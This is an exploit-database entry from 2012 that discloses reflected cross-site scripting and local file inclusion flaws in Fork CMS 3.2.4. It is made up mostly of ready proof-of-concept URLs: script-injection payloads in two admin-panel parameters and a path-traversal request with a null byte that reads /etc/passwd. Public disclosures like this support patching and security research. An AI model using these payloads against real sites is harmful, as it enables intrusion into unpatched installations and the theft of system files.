Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting

EDB-ID:

18483




Platform:

PHP

Date:

2012-02-12


 
########################################################################################################################## 

#  Exploit Title: Fork CMS v.3.2.4  - Multiple Vulnerabilities 

#  Script Page : http://www.fork-cms.com  
                   
#  Date: 11-02-2012

#  Author : RandomStorm  - http://www.randomstorm.com

#  Avram Marius Gabriel (d3v1l)

#  Tested on: Windows XP & Vista
 
 
########################################################################################################################## 
 
#  Reflected Cross-Site Scripting (XSS) on Admin Panel

#  POC:  

#  http://site.com/blog/settings?token=true&report=</script><script>alert(1)</script>  

#  http://site.com/users/index?token=true&error=</script><script>alert(1)</script> 
 
########################################################################################################################### 

#  Local File Inclusion ( LFI )

#  POC: 

#  http://site.com/frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en


##########################################################################################################################
 
# About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.

###########################################################################################################################